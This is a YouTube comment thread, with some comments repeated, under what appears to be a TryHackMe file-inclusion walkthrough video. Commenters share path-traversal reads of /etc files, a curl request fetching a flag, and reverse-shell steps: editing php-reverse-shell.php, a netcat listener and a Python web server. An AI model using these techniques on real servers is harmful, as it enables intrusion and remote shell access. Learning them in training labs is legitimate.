I somehow struggled my way through these challenges but didn't really feel like I understood the material. Your explanation was much better than the written material
I really loved to study cybersecurity for the past month but after I got to this point i gave up convincing myself that i am too stupid for all of this since i couldnt understand a single word they wrote on the site but after coming across this video and reading the comments i decided i am going to try again, thank you
Thank you for a thorough and concise tutorial. There is no way I could have completed that challenge without your help. Now I just need to do it another five times and I might be able to remember how to do this! Keep up the GREAT work!
Try Hack Me has a beginner course called How the Web Works or something like that. If you’re getting a little lost on this video I’d try that course out
انا لقيت اسمك عربي فسمحلي اكتب بالعربي فبجد مجهود رائع وشرح سهل ومبسط كمان اخر جزء في الفيديو كان رهيب. حقيقي فخور ان في مسلمين بالمهارة دي. اتمنى أوصل لمستوى حضرتك.
Well done, much better explanations than the provided material. I really think they need to revise or flesh out some of these labs, for example some of the tools that may be helpful such as burp suite aren't covered until later in the path. I ran into a similar issue when they were talking about decoding sha, md5, and base64, they gave you a link to help you with the later but not the base64, later in the path they provided a link. Funny enough it was the one I just happened upon to complete the lab.
thanks for the help brother. I didn't just want the answers so I'm happy I came across your channel so I could actually learn step by step. that made much more sense then the verbage they had.
Thank you!!! Really appreciate the time you put in to this. It was a big help with my limited time to study! I could not repeat the very last bonus challenge. My attack box is not using a TryHackMe accout, only root and I don't the same files and folder on it. I wonder why the attack boxes are so different. Thanks for doing it though.
I thought it was well done! the best break down I've seen out here. I'm glad to have subscribed and will check out the rest of the vids. Keeo up the great work!
Very well done sir, I needed a little help with the final 3 questions and you're 'answers' were perfect. Using curl to switch the methods was a great idea, I tried it with Burpsuite but it wasn't working for some reason.
@@slybandit8117 Yeah I managed to finish the room, I had to do the CURL method too I still don't know why burpsuite didnt work?! lol thanks for replying
Hello Motasem, thank you for taking the time to make this video. I would have never finished without you help. The one thing that really confuses me is using burp on the THM vm. So I basically followed along from there. Is there a way to complete the challenge without burb? Thanks again, Ed
In challenge 1, it was specified in the page that we have to use post req and yet we used get in this part of curl "-d 'method=get&file=/etc/flag1'. Why is it so? Can someone please explain this to me? Thanks!
New Subscriber! Awsome work, my brother! Keep them coming! You are explaining in such an easy way, its easy to understand! Natural talent! Keep it up! :))))
Great walk through. The question I have, is how does changing the cookie to a file path work. I saw you do it. But I do not understand how or why it works.
Thanks for video! Somehow I am unable to execute RFI tasks - no code executed neither from my local web server nor from external ones, even the simpliest scripts or shells, according to server logs - vulnerable host not getting it from my server and showing blank "File content preview". Cheated to read /etc/hostname via simple LFI ;(
did you modify the scripts? for example on the php-reverse-shell script you need to open in an editor [nano/subl/vi] and change the IP and port to your local attack machine and port you want to catch the reverse shell back on? Then open net cat listener for example [nc -lvnp 4444] and then execute the command on victim machine and you should catch that shell
How would anyone who's a beginner be able to figure out these last few tasks without a video like this? They cannot possibly expect people to be able to solve these with such poor instructions. It makes me feel like I'm trying to tackle something that's just not possible.
this is the best walkthrough on FI- Thanks for the post! One quick question : I cannot navigate to the tools>php.reverseshell to gain RCE, please assist if you can?
Challenge 3 and the last challenge remote execution were very difficult. After spending over 1.5 hours, I decided just to use your answer so I can move on to the next stage. ..
you tell me why we could not do it with burp suite and we could do it with curl, and can you explain the commands you wrote in curl, I need to understand please :)
Thanks! Just a quick question about playground challenge. What is the difference between apache server and python3 that you used? And why is apache using my IP and python using VPN IP?
That’s a good question but best guess is if the Apache web server is using your WAN IP that would be available through the internet while the python web server would only be reachable on the local 10.10.X.X network you’re connected to through the VPN. Once you set up the python web server you can connect to it through the browser by putting in your local IP address
Is it possible to use the method as suggest in the Task? edit the method as POST in the Web Developer. I know Burp suit is an option, but this module comes after the RFI task are completed in the learning path
im just curious about this... you have to use without know anything Burpsuite? when the burpsuite room is on the next module? this room is a bit hard for people like us.
@@MotasemHamdan i decided to stop this room for a while and start the other easy modules about the web fundamentals and Comptia Pentest+, because i need more logic and more understanding about how this works.
you can learn some thing in Authentication Bypass room. The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string
When right-klickinh in the proxy Tab you will see the option "change method". It will also change a bit of the structure of the request. Hope that helps
thanks for the walkthrough. I think it could have been slightly more in-depth in describing why you did certain things. but wow, the low quality of this tryhackme lesson itself was mind-boggling and painful to go through.
All in all, THM is a great platform and I guess you know that there is no platform that is perfect :) I have had my own share of tech problems in HTB too.
They show you basic stuff then when you need to practice that stuff,they add allot of more that they didnt explain to you. This is why i canceled my sub,and im switching to HTB Academy in first july.
Was having a bit of trouble with the reverse shell at the end of the video. I'm using kali and ran the command 'locate webshells | grep php' to find where my php webshells were and then I ran the webserver from the directory that php-reverse-shell.php is in. But when I use that as the payload I got an error that said: WARNING: Failed to daemonise. This is quite common and not fatal. Warning: fsockopen() [function.fsockopen]: unable to connect to 127.0.0.1:1234 (Connection refused) in 10.13.49.109:8000/php-reverse-shell.php on line 100 I looked at the script at line 100 which says: $sock = fsockopen($ip, $port, $errno, $errstr, 30); If you scroll to the top of the script there's comments that tell you to edit the variables $ip and $port I only edited the ip to match my local IP on the 10.10.x.x network - the one you get when you run ifconfig. The port in the script is set to 1234 so I ran: nc -lvp 1234 as the listener. After I did all this the reverse shell worked for me.
I somehow struggled my way through these challenges but didn't really feel like I understood the material. Your explanation was much better than the written material
I agree. It was very poorly written and confusing.
believe me when I tell you, you're not alone!!!
absolutely agree
I really loved to study cybersecurity for the past month but after I got to this point i gave up convincing myself that i am too stupid for all of this since i couldnt understand a single word they wrote on the site but after coming across this video and reading the comments i decided i am going to try again, thank you
I wouldn't be able to do this task without this video. good explanation
Thank you for a thorough and concise tutorial. There is no way I could have completed that challenge without your help. Now I just need to do it another five times and I might be able to remember how to do this! Keep up the GREAT work!
This really helped me sir ! But I must say that this is a liitle too advanced for beginners.
Its very fun though !
Try Hack Me has a beginner course called How the Web Works or something like that. If you’re getting a little lost on this video I’d try that course out
@@DeeMeltDown even after completing that its still overwhelming
This room was the first room where i started getting problems. Thanks for this tutorial.
Exactly
انا لقيت اسمك عربي فسمحلي اكتب بالعربي
فبجد مجهود رائع وشرح سهل ومبسط
كمان اخر جزء في الفيديو كان رهيب. حقيقي فخور ان في مسلمين بالمهارة دي. اتمنى أوصل لمستوى حضرتك.
Well done, much better explanations than the provided material. I really think they need to revise or flesh out some of these labs, for example some of the tools that may be helpful such as burp suite aren't covered until later in the path. I ran into a similar issue when they were talking about decoding sha, md5, and base64, they gave you a link to help you with the later but not the base64, later in the path they provided a link. Funny enough it was the one I just happened upon to complete the lab.
The only video you need to understand whole file inclusion concept!!
Thank you so much for this. ❤❤
thanks man! tried the challenges by myself for a while but had no chance. with your help I completed it while still learning a lot.
nice work on this one, really cleared up my mind. Thanks keep it up
love the videos man - so informative and plenty of time to pause and try out yourself out without blurting out the answers
thank you for activating the subtitles, it gives us the possibility to put the translation in French
Thank you for this walkthrough! I could not wrap my head around this room. So much help!
Thanks very much, the written tutorial for this was not particularly helpful but this is much better.
This helped so much even after I'd read the written write up.
thank you so much for this. This walk through is so much better then the room. And i was able to follow along as a mid level cyber learner. 💕
thanks for the help brother. I didn't just want the answers so I'm happy I came across your channel so I could actually learn step by step. that made much more sense then the verbage they had.
Thank you! Challenge 3 was whooping my a** and this helped me through. Great explanation good sir!
Thank you for sharing this video, I got a lil stuck on this one but you helped me finally understand what needed to be done/what I was supposed todo
Amazing, this helps so much, you have no idea how great of a instructor you are. Muchas Gracias
Thank you!!! Really appreciate the time you put in to this. It was a big help with my limited time to study! I could not repeat the very last bonus challenge. My attack box is not using a TryHackMe accout, only root and I don't the same files and folder on it. I wonder why the attack boxes are so different. Thanks for doing it though.
I thought it was well done! the best break down I've seen out here. I'm glad to have subscribed and will check out the rest of the vids. Keeo up the great work!
He sounds like a lawyer or a medic talking to a patient. Becoming surprised when hearing concerning details, but trying to keep you calm.
loved the content and the way of explanation thanku brother i was lacking in this specific topic i think i am cleard with it now ❤🔥❤🔥❤🔥❤🔥❤🔥
This one is massively unclear in the room. I’ve never had such problems yet as this room.
Very well done sir, I needed a little help with the final 3 questions and you're 'answers' were perfect. Using curl to switch the methods was a great idea, I tried it with Burpsuite but it wasn't working for some reason.
Me too with burpsuite it wouldn't work...have you figured out why?
@@vacumecleaner no I did not. I DID finish the room, but I must have used a different method, looking at my comment I used CURL instead.
Were you able to complete the room at least?
@@slybandit8117 Yeah I managed to finish the room, I had to do the CURL method too I still don't know why burpsuite didnt work?! lol thanks for replying
Thank you so much for letting us for this tutorial.
And thanks for the php reverse shell XD
It's really helpful for a beginner
Hello Motasem, thank you for taking the time to make this video. I would have never finished without you help. The one thing that really confuses me is using burp on the THM vm. So I basically followed along from there. Is there a way to complete the challenge without burb? Thanks again, Ed
In challenge 1, it was specified in the page that we have to use post req and yet we used get in this part of curl "-d 'method=get&file=/etc/flag1'. Why is it so? Can someone please explain this to me? Thanks!
I would also like to get an answer.
New Subscriber! Awsome work, my brother! Keep them coming! You are explaining in such an easy way, its easy to understand! Natural talent! Keep it up! :))))
Great walk through. The question I have, is how does changing the cookie to a file path work. I saw you do it. But I do not understand how or why it works.
26:53 its already configured to POST right?(-->curl -X POST
Totally right. I was just experimenting with it.
Was stuck on Lab 3. Thanks for the help
Thanks for video!
Somehow I am unable to execute RFI tasks - no code executed neither from my local web server nor from external ones, even the simpliest scripts or shells, according to server logs - vulnerable host not getting it from my server and showing blank "File content preview". Cheated to read /etc/hostname via simple LFI ;(
did you modify the scripts? for example on the php-reverse-shell script you need to open in an editor [nano/subl/vi] and change the IP and port to your local attack machine and port you want to catch the reverse shell back on? Then open net cat listener for example [nc -lvnp 4444] and then execute the command on victim machine and you should catch that shell
How would anyone who's a beginner be able to figure out these last few tasks without a video like this? They cannot possibly expect people to be able to solve these with such poor instructions. It makes me feel like I'm trying to tackle something that's just not possible.
this is the best walkthrough on FI- Thanks for the post! One quick question
: I cannot navigate to the tools>php.reverseshell to gain RCE, please assist if you can?
What's your labs techno behind ? Kubernetes namespaces and PODs popping on-demand ? or static site ?
Wow! Great video, very helpful... Thank you!
Thankss
On Challenge 2 why is my Burp Intercept Tab doesnt pick up anything whenever I try to reload the page?
Challenge 3 and the last challenge remote execution were very difficult. After spending over 1.5 hours, I decided just to use your answer so I can move on to the next stage. ..
I always like your video. well explained and clear
you tell me why we could not do it with burp suite and we could do it with curl, and can you explain the commands you wrote in curl, I need to understand please :)
Thank you so much! Has been a great guide and help with this challenges!
Thanks, I was really stuck on a couple of the challenges later. I tried and tried and it didn't work.
Good walkthrough but you should put timestamps in video
Every time I type the curl command verbatim it doesn't give me the flag. What is it that I'm doing wrong?
Thanks! Just a quick question about playground challenge. What is the difference between apache server and python3 that you used? And why is apache using my IP and python using VPN IP?
That’s a good question but best guess is if the Apache web server is using your WAN IP that would be available through the internet while the python web server would only be reachable on the local 10.10.X.X network you’re connected to through the VPN. Once you set up the python web server you can connect to it through the browser by putting in your local IP address
how can one view the contents of flag1 with burn suite. I guess many of us can't use burp suite. A tutorial will be great. thanks
Thank you so much Motasem.
Where can I obtain that 'php-reverse-shell.php' file to gain access?
Is it possible to use the method as suggest in the Task? edit the method as POST in the Web Developer. I know Burp suit is an option, but this module comes after the RFI task are completed in the learning path
I watched this whole video only to find out I forgot to use :8000 on the webserver when targeting my RCE. Good content though!
im just curious about this... you have to use without know anything Burpsuite? when the burpsuite room is on the next module? this room is a bit hard for people like us.
In a typical scenario, you don't need Burp Suite. Any HTTP interceptor works
@@MotasemHamdan i decided to stop this room for a while and start the other easy modules about the web fundamentals and Comptia Pentest+, because i need more logic and more understanding about how this works.
@@simonbolivar9146 I know its been a while but you can use inspect element, e.g for the cookies bit just go into storage and change the cookies there
Why do we change the method to post in the 3rd challenge and why do we not change the method in the first challenge ???
Thank you, this really helped 🙂
Can you demonstrate how to use curl to do the cookie instead of burp?
--cookie
I found an alternative in inspect element. Turns out you can access the cookies through there.
I'm not sure if challenge 3 was updated, but this method does not work for me to retrieve the third flag. I am completely lost.
you can learn some thing in Authentication Bypass room. The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string
this was good. Thank you!
very coherent, earned my sub
Thanks, it was very clear and useful!
Thank you for a great walkthrough.
can u give us the repo directory? any github link or something else ??
Thanks, I change method and url by inspecting but didn't work 😞
How do you get your console to split view like that?
when you used a reverse shell by netcat
why you used 4545port instead 8000 ?
It's just a personal preference. What's your preferred port?
Very helpful. thank you
could you please show me how to do with burpsuite? because that's the first thing I did by changing the request to POST but didn't get the page
When right-klickinh in the proxy Tab you will see the option "change method".
It will also change a bit of the structure of the request. Hope that helps
I thought I could do it in the developer options or is there no way?
At 20:00 can someone explain me why he changed the get request to get when it was get already.
Can you set cookies from the developer tools instead of using burp suite?
of course
This is a great video, but every time I watch you go find and then copy and paste instead of typing "%00" I get a little anxious! :P
I will try :)
Just wondering what software or vm are you using?
Kali KDE Plasma
@@MotasemHamdan I was wondering if you were using VM fusion?
Oops I mean vsphere?
Wow, love your channel men. How can i get access to your notes, i need notes for web penetration
Hello, Notes are available as part of the channel memberships.
ruclips.net/channel/UCNSdU_1ehXtGclimTVckHmQjoin
thanks for the walkthrough. I think it could have been slightly more in-depth in describing why you did certain things. but wow, the low quality of this tryhackme lesson itself was mind-boggling and painful to go through.
What’s the code for that reverse shell?
man, why your recordings are on so low volume? Is so annoying when the commercial comes.
did someone do LAB 5 and if yes what was the bypass
another comment: what icon set are you using in Kali? I want to try it out
KALI KDE Plasma
@@MotasemHamdan Thank you! Never tried it
Thank You!
Domu arigato, sensei
thanks so much
ty bro!
TY brother
Thanks!
Thank you too.
I need file shell.php:)
Please next time just volume up your voice. I cannot hear you clearly even I turn it on max volumn
Firt view and first like
hi i am using THM attackbox to attempt the RCE challange , how do i start a webserver ?
sudo python3 -m http.server
This Room was the go for me to switch to HTB. This Room is dogshit sorry ...
All in all, THM is a great platform and I guess you know that there is no platform that is perfect :) I have had my own share of tech problems in HTB too.
@@MotasemHamdan good Point… i should use this Video to step up. Ty Brother 👍🏼
task 8, Capture Flag2 at /etc/flag2 starts from 00:20:41
if if use this reverse shell: my nc shuts down as soon as the link is established, what is the reason
for the last one, you could also just get the hostname by ../../../../etc/hostname lol
what the hell? this tryhackme module made 0 sense.
They show you basic stuff then when you need to practice that stuff,they add allot of more that they didnt explain to you. This is why i canceled my sub,and im switching to HTB Academy in first july.
Was having a bit of trouble with the reverse shell at the end of the video. I'm using kali and ran the command 'locate webshells | grep php' to find where my php webshells were and then I ran the webserver from the directory that php-reverse-shell.php is in. But when I use that as the payload I got an error that said:
WARNING: Failed to daemonise. This is quite common and not fatal.
Warning: fsockopen() [function.fsockopen]: unable to connect to 127.0.0.1:1234 (Connection refused) in 10.13.49.109:8000/php-reverse-shell.php on line 100
I looked at the script at line 100 which says: $sock = fsockopen($ip, $port, $errno, $errstr, 30);
If you scroll to the top of the script there's comments that tell you to edit the variables $ip and $port
I only edited the ip to match my local IP on the 10.10.x.x network - the one you get when you run ifconfig. The port in the script is set to 1234 so I ran: nc -lvp 1234 as the listener.
After I did all this the reverse shell worked for me.
thank you!